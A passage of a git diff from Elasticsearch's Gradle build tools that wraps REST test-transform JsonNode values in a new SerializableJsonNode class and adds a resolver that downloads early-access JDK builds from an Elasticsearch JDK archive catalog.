DocumentBuilderFactory.newInstance(); DocumentBuilder dBuilder = dbFactory.newDocumentBuilder(); doc = dBuilder.parse(bis); @@ -66,17 +65,16 @@ public void transform(TransformerContext context) { this.doc = null; } } catch (Exception e) { - throw new RuntimeException("Error parsing xml file in " + context.getIs(), e); + throw new RuntimeException("Error parsing xml file in " + context.getInputStream(), e); } } private static String getRelocatedClass(String className, TransformerContext context) { - List relocators = context.getRelocators(); - ShadowStats stats = context.getStats(); + Set relocators = context.getRelocators(); if (className != null && className.length() > 0 && relocators != null) { for (Relocator relocator : relocators) { if (relocator.canRelocateClass(className)) { - RelocateClassContext relocateClassContext = new RelocateClassContext(className, stats); + RelocateClassContext relocateClassContext = new RelocateClassContext(className); return relocator.relocateClass(relocateClassContext); } } @@ -111,8 +109,6 @@ public boolean hasTransformedResource() { @Override public void modifyOutputStream(ZipOutputStream os, boolean preserveFileTimestamps) { ZipEntry entry = new ZipEntry(resource); - entry.setTime(TransformerContext.getEntryTimestamp(preserveFileTimestamps, entry.getTime())); - try { // Write the content back to the XML file TransformerFactory transformerFactory = TransformerFactory.newInstance(); diff --git a/build-tools-internal/src/main/java/org/elasticsearch/gradle/internal/test/rest/compat/compat/RestCompatTestTransformTask.java b/build-tools-internal/src/main/java/org/elasticsearch/gradle/internal/test/rest/compat/compat/RestCompatTestTransformTask.java index 6d6590429feb1..31d4947b064f2 100644 --- a/build-tools-internal/src/main/java/org/elasticsearch/gradle/internal/test/rest/compat/compat/RestCompatTestTransformTask.java +++ b/build-tools-internal/src/main/java/org/elasticsearch/gradle/internal/test/rest/compat/compat/RestCompatTestTransformTask.java @@ -26,6 +26,7 @@ import org.elasticsearch.gradle.VersionProperties; import org.elasticsearch.gradle.internal.test.rest.transform.RestTestTransform; import org.elasticsearch.gradle.internal.test.rest.transform.RestTestTransformer; +import org.elasticsearch.gradle.internal.test.rest.transform.SerializableJsonNode; import org.elasticsearch.gradle.internal.test.rest.transform.close_to.ReplaceValueInCloseTo; import 
org.elasticsearch.gradle.internal.test.rest.transform.do_.ReplaceKeyInDo; import org.elasticsearch.gradle.internal.test.rest.transform.headers.InjectHeaders; @@ -169,7 +170,7 @@ public void skipTestsByFilePattern(String filePattern, String reason) { * @param value the value used in the replacement. For example "bar" */ public void replaceValueInMatch(String subKey, Object value) { - getTransformations().add(new ReplaceValueInMatch(subKey, MAPPER.convertValue(value, JsonNode.class))); + getTransformations().add(new ReplaceValueInMatch(subKey, SerializableJsonNode.of(value, JsonNode.class))); } /** @@ -180,7 +181,7 @@ public void replaceValueInMatch(String subKey, Object value) { * @param testName the testName to apply replacement */ public void replaceValueInMatch(String subKey, Object value, String testName) { - getTransformations().add(new ReplaceValueInMatch(subKey, MAPPER.convertValue(value, JsonNode.class), testName)); + getTransformations().add(new ReplaceValueInMatch(subKey, SerializableJsonNode.of(value, JsonNode.class), testName)); } /** @@ -225,7 +226,7 @@ public void replaceKeyInLength(String oldKeyName, String newKeyName) { * @param value the value used in the replacement. For example 99 */ public void replaceValueInLength(String subKey, int value) { - getTransformations().add(new ReplaceValueInLength(subKey, MAPPER.convertValue(value, NumericNode.class))); + getTransformations().add(new ReplaceValueInLength(subKey, SerializableJsonNode.of(value, NumericNode.class))); } /** @@ -237,7 +238,7 @@ public void replaceValueInLength(String subKey, int value) { * @param testName the testName to apply replacement */ public void replaceValueInLength(String subKey, int value, String testName) { - getTransformations().add(new ReplaceValueInLength(subKey, MAPPER.convertValue(value, NumericNode.class), testName)); + getTransformations().add(new ReplaceValueInLength(subKey, SerializableJsonNode.of(value, NumericNode.class), testName)); } /** @@ -260,7 +261,7 @@ public void replaceKeyInMatch(String oldKeyName, String newKeyName) { * @param testName the testName to apply replacement */ public void replaceValueInCloseTo(String subKey, double newValue, String testName) { - getTransformations().add(new ReplaceValueInCloseTo(subKey, MAPPER.convertValue(newValue, NumericNode.class), testName)); + getTransformations().add(new ReplaceValueInCloseTo(subKey, SerializableJsonNode.of(newValue, NumericNode.class), testName)); } /** @@ -271,7 +272,7 @@ public void replaceValueInCloseTo(String subKey, double newValue, String testNam * @param newValue the value used in the replacement. 
For example 9.5 */ public void replaceValueInCloseTo(String subKey, double newValue) { - getTransformations().add(new ReplaceValueInCloseTo(subKey, MAPPER.convertValue(newValue, NumericNode.class))); + getTransformations().add(new ReplaceValueInCloseTo(subKey, SerializableJsonNode.of(newValue, NumericNode.class))); } /** @@ -282,7 +283,7 @@ public void replaceValueInCloseTo(String subKey, double newValue) { * @param newValue the value used in the replacement */ public void replaceIsTrue(String oldValue, Object newValue) { - getTransformations().add(new ReplaceIsTrue(oldValue, MAPPER.convertValue(newValue, TextNode.class))); + getTransformations().add(new ReplaceIsTrue(oldValue, SerializableJsonNode.of(newValue, TextNode.class))); } /** @@ -294,7 +295,7 @@ public void replaceIsTrue(String oldValue, Object newValue) { * @param testName the testName to apply replacement */ public void replaceIsTrue(String oldValue, Object newValue, String testName) { - getTransformations().add(new ReplaceIsTrue(oldValue, MAPPER.convertValue(newValue, TextNode.class), testName)); + getTransformations().add(new ReplaceIsTrue(oldValue, SerializableJsonNode.of(newValue, TextNode.class), testName)); } /** @@ -305,7 +306,7 @@ public void replaceIsTrue(String oldValue, Object newValue, String testName) { * @param newValue the value used in the replacement */ public void replaceIsFalse(String oldValue, Object newValue) { - getTransformations().add(new ReplaceIsFalse(oldValue, MAPPER.convertValue(newValue, TextNode.class))); + getTransformations().add(new ReplaceIsFalse(oldValue, SerializableJsonNode.of(newValue, TextNode.class))); } /** @@ -317,7 +318,7 @@ public void replaceIsFalse(String oldValue, Object newValue) { * @param testName the testName to apply replacement */ public void replaceIsFalse(String oldValue, Object newValue, String testName) { - getTransformations().add(new ReplaceIsFalse(oldValue, MAPPER.convertValue(newValue, TextNode.class), testName)); + getTransformations().add(new ReplaceIsFalse(oldValue, SerializableJsonNode.of(newValue, TextNode.class), testName)); } /** @@ -329,7 +330,7 @@ public void replaceIsFalse(String oldValue, Object newValue, String testName) { * @param newValue the value used in the replacement */ public void replaceValueTextByKeyValue(String key, String oldValue, Object newValue) { - getTransformations().add(new ReplaceTextual(key, oldValue, MAPPER.convertValue(newValue, TextNode.class))); + getTransformations().add(new ReplaceTextual(key, oldValue, SerializableJsonNode.of(newValue, TextNode.class))); } /** @@ -342,7 +343,7 @@ public void replaceValueTextByKeyValue(String key, String oldValue, Object newVa * @param testName the testName to apply replacement */ public void replaceValueTextByKeyValue(String key, String oldValue, Object newValue, String testName) { - getTransformations().add(new ReplaceTextual(key, oldValue, MAPPER.convertValue(newValue, TextNode.class), testName)); + getTransformations().add(new ReplaceTextual(key, oldValue, SerializableJsonNode.of(newValue, TextNode.class), testName)); } /** @@ -376,7 +377,7 @@ public void removeMatch(String subKey, String testName) { * @param testName the testName to apply addition */ public void addMatch(String subKey, Object value, String testName) { - getTransformations().add(new AddMatch(subKey, MAPPER.convertValue(value, JsonNode.class), testName)); + getTransformations().add(new AddMatch(subKey, SerializableJsonNode.of(value, JsonNode.class), testName)); } /** diff --git 
a/build-tools-internal/src/main/java/org/elasticsearch/gradle/internal/test/rest/transform/ReplaceByKey.java b/build-tools-internal/src/main/java/org/elasticsearch/gradle/internal/test/rest/transform/ReplaceByKey.java index 17d50a1a95db1..3cf542b12398b 100644 --- a/build-tools-internal/src/main/java/org/elasticsearch/gradle/internal/test/rest/transform/ReplaceByKey.java +++ b/build-tools-internal/src/main/java/org/elasticsearch/gradle/internal/test/rest/transform/ReplaceByKey.java @@ -10,6 +10,7 @@ package org.elasticsearch.gradle.internal.test.rest.transform; import com.fasterxml.jackson.databind.JsonNode; +import com.fasterxml.jackson.databind.node.ObjectNode; import org.gradle.api.tasks.Input; import org.gradle.api.tasks.Optional; @@ -25,18 +26,23 @@ public abstract class ReplaceByKey implements RestTestTransformByParentObject { private final String requiredChildKey; private final String newChildKey; - private final JsonNode replacementNode; + private final SerializableJsonNode replacementNode; private final String testName; - public ReplaceByKey(String requiredChildKey, JsonNode replacementNode) { + public ReplaceByKey(String requiredChildKey, SerializableJsonNode replacementNode) { this(requiredChildKey, replacementNode, null); } - public ReplaceByKey(String requiredChildKey, JsonNode replacementNode, String testName) { + public ReplaceByKey(String requiredChildKey, SerializableJsonNode replacementNode, String testName) { this(requiredChildKey, requiredChildKey, replacementNode, testName); } - public ReplaceByKey(String requiredChildKey, String newChildKey, JsonNode replacementNode, String testName) { + public ReplaceByKey( + String requiredChildKey, + String newChildKey, + SerializableJsonNode replacementNode, + String testName + ) { this.requiredChildKey = requiredChildKey; this.newChildKey = newChildKey; this.replacementNode = replacementNode; @@ -60,7 +66,7 @@ public boolean shouldApply(RestTestContext testContext) { @Input @Optional - public JsonNode getReplacementNode() { + public SerializableJsonNode getReplacementNode() { return replacementNode; } @@ -69,4 +75,10 @@ public JsonNode getReplacementNode() { public String getTestName() { return testName; } + + protected void updateReplacement(ObjectNode matchNode) { + matchNode.remove(requiredChildKey()); + matchNode.set(getNewChildKey(), replacementNode.toJsonNode()); + } + } diff --git a/build-tools-internal/src/main/java/org/elasticsearch/gradle/internal/test/rest/transform/SerializableJsonNode.java b/build-tools-internal/src/main/java/org/elasticsearch/gradle/internal/test/rest/transform/SerializableJsonNode.java new file mode 100644 index 0000000000000..1078084daea0a --- /dev/null +++ b/build-tools-internal/src/main/java/org/elasticsearch/gradle/internal/test/rest/transform/SerializableJsonNode.java @@ -0,0 +1,44 @@ +/* + * Copyright Elasticsearch B.V. and/or licensed to Elasticsearch B.V. under one + * or more contributor license agreements. Licensed under the "Elastic License + * 2.0", the "GNU Affero General Public License v3.0 only", and the "Server Side + * Public License v 1"; you may not use this file except in compliance with, at + * your election, the "Elastic License 2.0", the "GNU Affero General Public + * License v3.0 only", or the "Server Side Public License, v 1". 
+ */
+
+package org.elasticsearch.gradle.internal.test.rest.transform;
+
+import com.fasterxml.jackson.databind.JsonNode;
+import com.fasterxml.jackson.databind.ObjectMapper;
+import com.fasterxml.jackson.dataformat.yaml.YAMLFactory;
+
+import java.io.Serializable;
+
+/**
+ * A serializable wrapper for a JsonNode that can be used as a Gradle task input.
+ * This is necessary because JsonNode serialization is not supported by the Gradle configuration cache,
+ * as it relies on DataInput.readFully, which is unsupported by Gradle.
+ *
+ * @param <T> The type of JsonNode this wrapper will hold.
+ */
+public class SerializableJsonNode<T extends JsonNode> implements Serializable {
+
+    private Object value;
+    private Class<T> type;
+
+    SerializableJsonNode(Object value, Class<T> type) {
+        this.value = value;
+        this.type = type;
+    }
+
+    public static <T extends JsonNode> SerializableJsonNode<T> of(Object value, Class<T> type) {
+        return new SerializableJsonNode<>(value, type);
+    }
+
+    public T toJsonNode() {
+        YAMLFactory yamlFactory = new YAMLFactory();
+        ObjectMapper mapper = new ObjectMapper(yamlFactory);
+        return mapper.convertValue(value, type);
+    }
+}
diff --git a/build-tools-internal/src/main/java/org/elasticsearch/gradle/internal/test/rest/transform/close_to/ReplaceValueInCloseTo.java b/build-tools-internal/src/main/java/org/elasticsearch/gradle/internal/test/rest/transform/close_to/ReplaceValueInCloseTo.java
index 96561c3cf5444..0c3ac908fe224 100644
--- a/build-tools-internal/src/main/java/org/elasticsearch/gradle/internal/test/rest/transform/close_to/ReplaceValueInCloseTo.java
+++ b/build-tools-internal/src/main/java/org/elasticsearch/gradle/internal/test/rest/transform/close_to/ReplaceValueInCloseTo.java
@@ -13,6 +13,7 @@
 import com.fasterxml.jackson.databind.node.ObjectNode;
 
 import org.elasticsearch.gradle.internal.test.rest.transform.ReplaceByKey;
+import org.elasticsearch.gradle.internal.test.rest.transform.SerializableJsonNode;
 import org.gradle.api.tasks.Internal;
 
 /**
@@ -22,11 +23,11 @@
  */
 public class ReplaceValueInCloseTo extends ReplaceByKey {
 
-    public ReplaceValueInCloseTo(String replaceKey, NumericNode replacementNode) {
+    public ReplaceValueInCloseTo(String replaceKey, SerializableJsonNode<NumericNode> replacementNode) {
         this(replaceKey, replacementNode, null);
     }
 
-    public ReplaceValueInCloseTo(String replaceKey, NumericNode replacementNode, String testName) {
+    public ReplaceValueInCloseTo(String replaceKey, SerializableJsonNode<NumericNode> replacementNode, String testName) {
         super(replaceKey, replaceKey, replacementNode, testName);
     }
 
@@ -41,6 +42,7 @@ public void transformTest(ObjectNode matchParent) {
         ObjectNode closeToNode = (ObjectNode) matchParent.get(getKeyToFind());
         ObjectNode subNode = (ObjectNode) closeToNode.get(requiredChildKey());
         subNode.remove("value");
-        subNode.set("value", getReplacementNode());
+        subNode.set("value", getReplacementNode().toJsonNode());
     }
+
 }
diff --git a/build-tools-internal/src/main/java/org/elasticsearch/gradle/internal/test/rest/transform/length/ReplaceValueInLength.java b/build-tools-internal/src/main/java/org/elasticsearch/gradle/internal/test/rest/transform/length/ReplaceValueInLength.java
index 936deea70703d..50a6493049bcf 100644
--- a/build-tools-internal/src/main/java/org/elasticsearch/gradle/internal/test/rest/transform/length/ReplaceValueInLength.java
+++ b/build-tools-internal/src/main/java/org/elasticsearch/gradle/internal/test/rest/transform/length/ReplaceValueInLength.java
@@ -9,10 +9,10 @@
 package org.elasticsearch.gradle.internal.test.rest.transform.length;
 
-import
com.fasterxml.jackson.databind.node.NumericNode; import com.fasterxml.jackson.databind.node.ObjectNode; import org.elasticsearch.gradle.internal.test.rest.transform.ReplaceByKey; +import org.elasticsearch.gradle.internal.test.rest.transform.SerializableJsonNode; import org.gradle.api.tasks.Internal; /** @@ -21,11 +21,11 @@ */ public class ReplaceValueInLength extends ReplaceByKey { - public ReplaceValueInLength(String replaceKey, NumericNode replacementNode) { + public ReplaceValueInLength(String replaceKey, SerializableJsonNode replacementNode) { this(replaceKey, replacementNode, null); } - public ReplaceValueInLength(String replaceKey, NumericNode replacementNode, String testName) { + public ReplaceValueInLength(String replaceKey, SerializableJsonNode replacementNode, String testName) { super(replaceKey, replaceKey, replacementNode, testName); } @@ -38,7 +38,7 @@ public String getKeyToFind() { @Override public void transformTest(ObjectNode matchParent) { ObjectNode matchNode = (ObjectNode) matchParent.get(getKeyToFind()); - matchNode.remove(requiredChildKey()); - matchNode.set(getNewChildKey(), getReplacementNode()); + updateReplacement(matchNode); } + } diff --git a/build-tools-internal/src/main/java/org/elasticsearch/gradle/internal/test/rest/transform/match/AddMatch.java b/build-tools-internal/src/main/java/org/elasticsearch/gradle/internal/test/rest/transform/match/AddMatch.java index ff8ec820d60c4..f5f7a7f55ce03 100644 --- a/build-tools-internal/src/main/java/org/elasticsearch/gradle/internal/test/rest/transform/match/AddMatch.java +++ b/build-tools-internal/src/main/java/org/elasticsearch/gradle/internal/test/rest/transform/match/AddMatch.java @@ -16,6 +16,7 @@ import org.elasticsearch.gradle.internal.test.rest.transform.RestTestContext; import org.elasticsearch.gradle.internal.test.rest.transform.RestTestTransformByParentArray; +import org.elasticsearch.gradle.internal.test.rest.transform.SerializableJsonNode; import org.gradle.api.tasks.Input; import org.gradle.api.tasks.Internal; @@ -28,9 +29,9 @@ public class AddMatch implements RestTestTransformByParentArray { private static JsonNodeFactory jsonNodeFactory = JsonNodeFactory.withExactBigDecimals(false); private final String matchKey; private final String testName; - private final JsonNode matchValue; + private final SerializableJsonNode matchValue; - public AddMatch(String matchKey, JsonNode matchValue, String testName) { + public AddMatch(String matchKey, SerializableJsonNode matchValue, String testName) { this.matchKey = matchKey; this.matchValue = matchValue; this.testName = Objects.requireNonNull(testName, "adding matches is only supported for named tests"); @@ -45,7 +46,7 @@ public boolean shouldApply(RestTestContext testContext) { public void transformTest(ArrayNode matchParent) { ObjectNode matchObject = new ObjectNode(jsonNodeFactory); ObjectNode matchContent = new ObjectNode(jsonNodeFactory); - matchContent.set(matchKey, matchValue); + matchContent.set(matchKey, matchValue.toJsonNode()); matchObject.set("match", matchContent); matchParent.add(matchObject); } @@ -70,6 +71,6 @@ public String getTestName() { @Input public JsonNode getMatchValue() { - return matchValue; + return matchValue.toJsonNode(); } } diff --git a/build-tools-internal/src/main/java/org/elasticsearch/gradle/internal/test/rest/transform/match/ReplaceValueInMatch.java b/build-tools-internal/src/main/java/org/elasticsearch/gradle/internal/test/rest/transform/match/ReplaceValueInMatch.java index 5e46934c8ba4a..f52558dbd2f2e 100644 --- 
a/build-tools-internal/src/main/java/org/elasticsearch/gradle/internal/test/rest/transform/match/ReplaceValueInMatch.java +++ b/build-tools-internal/src/main/java/org/elasticsearch/gradle/internal/test/rest/transform/match/ReplaceValueInMatch.java @@ -13,6 +13,7 @@ import com.fasterxml.jackson.databind.node.ObjectNode; import org.elasticsearch.gradle.internal.test.rest.transform.ReplaceByKey; +import org.elasticsearch.gradle.internal.test.rest.transform.SerializableJsonNode; import org.gradle.api.tasks.Internal; /** @@ -20,11 +21,11 @@ */ public class ReplaceValueInMatch extends ReplaceByKey { - public ReplaceValueInMatch(String replaceKey, JsonNode replacementNode) { + public ReplaceValueInMatch(String replaceKey, SerializableJsonNode replacementNode) { this(replaceKey, replacementNode, null); } - public ReplaceValueInMatch(String replaceKey, JsonNode replacementNode, String testName) { + public ReplaceValueInMatch(String replaceKey, SerializableJsonNode replacementNode, String testName) { super(replaceKey, replaceKey, replacementNode, testName); } @@ -37,7 +38,6 @@ public String getKeyToFind() { @Override public void transformTest(ObjectNode matchParent) { ObjectNode matchNode = (ObjectNode) matchParent.get(getKeyToFind()); - matchNode.remove(requiredChildKey()); - matchNode.set(getNewChildKey(), getReplacementNode()); + updateReplacement(matchNode); } } diff --git a/build-tools-internal/src/main/java/org/elasticsearch/gradle/internal/test/rest/transform/text/ReplaceIsFalse.java b/build-tools-internal/src/main/java/org/elasticsearch/gradle/internal/test/rest/transform/text/ReplaceIsFalse.java index 53a35b09dd087..72e225918e187 100644 --- a/build-tools-internal/src/main/java/org/elasticsearch/gradle/internal/test/rest/transform/text/ReplaceIsFalse.java +++ b/build-tools-internal/src/main/java/org/elasticsearch/gradle/internal/test/rest/transform/text/ReplaceIsFalse.java @@ -11,12 +11,14 @@ import com.fasterxml.jackson.databind.node.TextNode; +import org.elasticsearch.gradle.internal.test.rest.transform.SerializableJsonNode; + public class ReplaceIsFalse extends ReplaceTextual { - public ReplaceIsFalse(String valueToBeReplaced, TextNode replacementNode) { + public ReplaceIsFalse(String valueToBeReplaced, SerializableJsonNode replacementNode) { super("is_false", valueToBeReplaced, replacementNode); } - public ReplaceIsFalse(String valueToBeReplaced, TextNode replacementNode, String testName) { + public ReplaceIsFalse(String valueToBeReplaced, SerializableJsonNode replacementNode, String testName) { super("is_false", valueToBeReplaced, replacementNode, testName); } } diff --git a/build-tools-internal/src/main/java/org/elasticsearch/gradle/internal/test/rest/transform/text/ReplaceIsTrue.java b/build-tools-internal/src/main/java/org/elasticsearch/gradle/internal/test/rest/transform/text/ReplaceIsTrue.java index 51db9c88774b7..c5bc8fb6e0d79 100644 --- a/build-tools-internal/src/main/java/org/elasticsearch/gradle/internal/test/rest/transform/text/ReplaceIsTrue.java +++ b/build-tools-internal/src/main/java/org/elasticsearch/gradle/internal/test/rest/transform/text/ReplaceIsTrue.java @@ -11,12 +11,14 @@ import com.fasterxml.jackson.databind.node.TextNode; +import org.elasticsearch.gradle.internal.test.rest.transform.SerializableJsonNode; + public class ReplaceIsTrue extends ReplaceTextual { - public ReplaceIsTrue(String valueToBeReplaced, TextNode replacementNode) { + public ReplaceIsTrue(String valueToBeReplaced, SerializableJsonNode replacementNode) { super("is_true", valueToBeReplaced, 
replacementNode); } - public ReplaceIsTrue(String valueToBeReplaced, TextNode replacementNode, String testName) { + public ReplaceIsTrue(String valueToBeReplaced, SerializableJsonNode replacementNode, String testName) { super("is_true", valueToBeReplaced, replacementNode, testName); } } diff --git a/build-tools-internal/src/main/java/org/elasticsearch/gradle/internal/test/rest/transform/text/ReplaceTextual.java b/build-tools-internal/src/main/java/org/elasticsearch/gradle/internal/test/rest/transform/text/ReplaceTextual.java index 6397e938f091c..ae9cc43dae2ed 100644 --- a/build-tools-internal/src/main/java/org/elasticsearch/gradle/internal/test/rest/transform/text/ReplaceTextual.java +++ b/build-tools-internal/src/main/java/org/elasticsearch/gradle/internal/test/rest/transform/text/ReplaceTextual.java @@ -15,6 +15,7 @@ import org.elasticsearch.gradle.internal.test.rest.transform.RestTestContext; import org.elasticsearch.gradle.internal.test.rest.transform.RestTestTransformByParentObject; +import org.elasticsearch.gradle.internal.test.rest.transform.SerializableJsonNode; import org.gradle.api.tasks.Input; import org.gradle.api.tasks.Internal; import org.gradle.api.tasks.Optional; @@ -25,17 +26,22 @@ public class ReplaceTextual implements RestTestTransformByParentObject { private final String keyToReplaceName; private final String valueToBeReplaced; - private final TextNode replacementNode; + private final SerializableJsonNode replacementNode; private final String testName; - public ReplaceTextual(String keyToReplaceName, String valueToBeReplaced, TextNode replacementNode) { + public ReplaceTextual(String keyToReplaceName, String valueToBeReplaced, SerializableJsonNode replacementNode) { this.keyToReplaceName = keyToReplaceName; this.valueToBeReplaced = valueToBeReplaced; this.replacementNode = replacementNode; this.testName = null; } - public ReplaceTextual(String keyToReplaceName, String valueToBeReplaced, TextNode replacementNode, String testName) { + public ReplaceTextual( + String keyToReplaceName, + String valueToBeReplaced, + SerializableJsonNode replacementNode, + String testName + ) { this.keyToReplaceName = keyToReplaceName; this.valueToBeReplaced = valueToBeReplaced; this.replacementNode = replacementNode; @@ -60,7 +66,7 @@ public boolean shouldApply(RestTestContext testContext) { @Override public void transformTest(ObjectNode matchParent) { - matchParent.set(getKeyToFind(), replacementNode); + matchParent.set(getKeyToFind(), replacementNode.toJsonNode()); } @Input @@ -69,7 +75,7 @@ public String getValueToBeReplaced() { } @Input - public JsonNode getReplacementNode() { + public SerializableJsonNode getReplacementNode() { return replacementNode; } diff --git a/build-tools-internal/src/main/java/org/elasticsearch/gradle/internal/toolchain/EarlyAccessCatalogJdkToolchainResolver.java b/build-tools-internal/src/main/java/org/elasticsearch/gradle/internal/toolchain/EarlyAccessCatalogJdkToolchainResolver.java new file mode 100644 index 0000000000000..e3063aeeff504 --- /dev/null +++ b/build-tools-internal/src/main/java/org/elasticsearch/gradle/internal/toolchain/EarlyAccessCatalogJdkToolchainResolver.java @@ -0,0 +1,179 @@ +/* + * Copyright Elasticsearch B.V. and/or licensed to Elasticsearch B.V. under one + * or more contributor license agreements. 
Licensed under the "Elastic License + * 2.0", the "GNU Affero General Public License v3.0 only", and the "Server Side + * Public License v 1"; you may not use this file except in compliance with, at + * your election, the "Elastic License 2.0", the "GNU Affero General Public + * License v3.0 only", or the "Server Side Public License, v 1". + */ + +package org.elasticsearch.gradle.internal.toolchain; + +import com.fasterxml.jackson.databind.JsonNode; +import com.fasterxml.jackson.databind.ObjectMapper; +import com.fasterxml.jackson.databind.node.ArrayNode; +import com.fasterxml.jackson.databind.node.ObjectNode; + +import org.elasticsearch.gradle.VersionProperties; +import org.gradle.jvm.toolchain.JavaLanguageVersion; +import org.gradle.jvm.toolchain.JavaToolchainDownload; +import org.gradle.jvm.toolchain.JavaToolchainRequest; +import org.gradle.jvm.toolchain.JavaToolchainSpec; +import org.gradle.platform.Architecture; +import org.gradle.platform.BuildPlatform; +import org.gradle.platform.OperatingSystem; + +import java.io.IOException; +import java.io.InputStream; +import java.net.MalformedURLException; +import java.net.URI; +import java.net.URL; +import java.util.ArrayList; +import java.util.Comparator; +import java.util.List; +import java.util.Optional; + +/** + * A toolchain resolver that resolves early access JDKs from the Elasticsearch JDK archive. + *

+ * This resolver can be used to resolve JDKs that are not bundled with Elasticsearch but are available in the early access catalog.
+ * It supports resolving JDKs based on their language version and build number.
+ *
+ * Currently the Gradle toolchain support does not allow querying specific versions (e.g. 26-ea+6), so for now
+ * this only supports resolving the latest early access build for a given language version.
+ *
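+ * The recent.json catalog consumed by findRecentPreReleaseBuild is assumed to have the shape
+ * (values illustrative; only the "major", "build" and "type" fields of each entry are read):
+ * { "majors": { "26": { "builds": [ { "major": "26", "build": "6", "type": "ea" } ] } } }
+ *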

+ */
+public abstract class EarlyAccessCatalogJdkToolchainResolver extends AbstractCustomJavaToolchainResolver {
+
+    public static final String RECENT_JDK_RELEASES_CATALOG_URL = "https://builds.es-jdk-archive.com/jdks/openjdk/recent.json";
+
+    interface JdkBuild {
+        JavaLanguageVersion languageVersion();
+
+        String url(String os, String arch, String extension);
+    }
+
+    @FunctionalInterface
+    interface EarlyAccessJdkBuildResolver {
+        PreReleaseJdkBuild findLatestEABuild(JavaLanguageVersion languageVersion);
+    }
+
+    // allow overriding for testing
+    EarlyAccessJdkBuildResolver earlyAccessJdkBuildResolver = (languageVersion) -> findLatestPreReleaseBuild(languageVersion);
+
+    public record PreReleaseJdkBuild(JavaLanguageVersion languageVersion, int buildNumber, String type) implements JdkBuild {
+        @Override
+        public String url(String os, String arch, String extension) {
+            // example:
+            // https://builds.es-jdk-archive.com/jdks/openjdk/26/openjdk-26-ea+6/openjdk-26-ea+6_linux-aarch64_bin.tar.gz
+
+            // RCs don't attach a special suffix to the artifact name
+            String releaseTypeSuffix = type.equals("ea") ? "-" + type + "+" + buildNumber : "";
+            return "https://builds.es-jdk-archive.com/jdks/openjdk/"
+                + languageVersion.asInt()
+                + "/"
+                + "openjdk-"
+                + languageVersion.asInt()
+                + "-"
+                + type
+                + "+"
+                + buildNumber
+                + "/"
+                + "openjdk-"
+                + languageVersion.asInt()
+                + releaseTypeSuffix
+                + "_"
+                + os
+                + "-"
+                + arch
+                + "_bin."
+                + extension;
+        }
+    }
+
+    private static final List<OperatingSystem> supportedOperatingSystems = List.of(
+        OperatingSystem.MAC_OS,
+        OperatingSystem.LINUX,
+        OperatingSystem.WINDOWS
+    );
+
+    /**
+     * We need some place to map JavaLanguageVersion to buildNumber, minor version etc.
+     */
+    @Override
+    public Optional<JavaToolchainDownload> resolve(JavaToolchainRequest request) {
+        if (Integer.parseInt(VersionProperties.getBundledJdkMajorVersion()) >= request.getJavaToolchainSpec()
+            .getLanguageVersion()
+            .get()
+            .asInt()) {
+        }
+        return findSupportedBuild(request).map(build -> {
+            OperatingSystem operatingSystem = request.getBuildPlatform().getOperatingSystem();
+            String extension = operatingSystem.equals(OperatingSystem.WINDOWS) ? "zip" : "tar.gz";
+            String arch = toArchString(request.getBuildPlatform().getArchitecture());
+            String os = toOsString(operatingSystem);
+            return (JavaToolchainDownload) () -> URI.create(build.url(os, arch, extension));
+        });
+    }
+
+    /**
+     * Check if the request can be fulfilled by this resolver:
+     * 1.
Aarch64 Windows images are not supported
+     */
+    private Optional<PreReleaseJdkBuild> findSupportedBuild(JavaToolchainRequest request) {
+        JavaToolchainSpec javaToolchainSpec = request.getJavaToolchainSpec();
+        BuildPlatform buildPlatform = request.getBuildPlatform();
+        Architecture architecture = buildPlatform.getArchitecture();
+        OperatingSystem operatingSystem = buildPlatform.getOperatingSystem();
+
+        if (supportedOperatingSystems.contains(operatingSystem) == false
+            || Architecture.AARCH64 == architecture && OperatingSystem.WINDOWS == operatingSystem) {
+            return Optional.empty();
+        }
+
+        JavaLanguageVersion languageVersion = javaToolchainSpec.getLanguageVersion().get();
+        return Optional.of(earlyAccessJdkBuildResolver.findLatestEABuild(languageVersion));
+    }
+
+    static List<PreReleaseJdkBuild> findRecentPreReleaseBuild(JavaLanguageVersion languageVersion) {
+        try {
+            URL url = new URL(RECENT_JDK_RELEASES_CATALOG_URL);
+            try (InputStream is = url.openStream()) {
+                ObjectMapper mapper = new ObjectMapper();
+                JsonNode node = mapper.readTree(is);
+                ObjectNode majors = (ObjectNode) node.get("majors");
+                ObjectNode perVersion = (ObjectNode) majors.get("" + languageVersion.asInt());
+                ArrayNode buildsNode = (ArrayNode) perVersion.get("builds");
+                List<JsonNode> buildsList = new ArrayList<>();
+                buildsNode.forEach(buildsList::add);
+                List<PreReleaseJdkBuild> eaBuilds = buildsList.stream()
+                    .map(
+                        n -> new PreReleaseJdkBuild(
+                            JavaLanguageVersion.of(n.get("major").asText()),
+                            Integer.parseInt(n.get("build").asText()),
+                            n.get("type").asText()
+                        )
+                    )
+                    .toList();
+                return eaBuilds.stream().filter(ea -> ea.languageVersion().equals(languageVersion)).toList();
+            } catch (IOException e) {
+                throw new RuntimeException(e);
+            }
+        } catch (MalformedURLException e) {
+            throw new RuntimeException(e);
+        }
+    }
+
+    public static PreReleaseJdkBuild findPreReleaseBuild(JavaLanguageVersion languageVersion, int buildNumber) {
+        return findRecentPreReleaseBuild(languageVersion).stream()
+            .filter(preReleaseJdkBuild -> preReleaseJdkBuild.buildNumber == buildNumber)
+            .max(Comparator.comparingInt(PreReleaseJdkBuild::buildNumber))
+            .get();
+    }
+
+    public static PreReleaseJdkBuild findLatestPreReleaseBuild(JavaLanguageVersion languageVersion) {
+        return findRecentPreReleaseBuild(languageVersion).stream().max(Comparator.comparingInt(PreReleaseJdkBuild::buildNumber)).get();
+    }
+
+}
diff --git a/build-tools-internal/src/main/java/org/elasticsearch/gradle/internal/toolchain/JavaToolChainResolverPlugin.java b/build-tools-internal/src/main/java/org/elasticsearch/gradle/internal/toolchain/JavaToolChainResolverPlugin.java
index b89eb87325754..1cacbb38fdd5d 100644
--- a/build-tools-internal/src/main/java/org/elasticsearch/gradle/internal/toolchain/JavaToolChainResolverPlugin.java
+++ b/build-tools-internal/src/main/java/org/elasticsearch/gradle/internal/toolchain/JavaToolChainResolverPlugin.java
@@ -23,6 +23,7 @@ public void apply(Settings settings) {
         settings.getPlugins().apply("jvm-toolchain-management");
         JavaToolchainResolverRegistry registry = getToolchainResolverRegistry();
         registry.register(OracleOpenJdkToolchainResolver.class);
+        registry.register(EarlyAccessCatalogJdkToolchainResolver.class);
         registry.register(AdoptiumJdkToolchainResolver.class);
         registry.register(ArchivedOracleJdkToolchainResolver.class);
     }
diff --git a/build-tools-internal/src/main/java/org/elasticsearch/gradle/internal/toolchain/OracleOpenJdkToolchainResolver.java
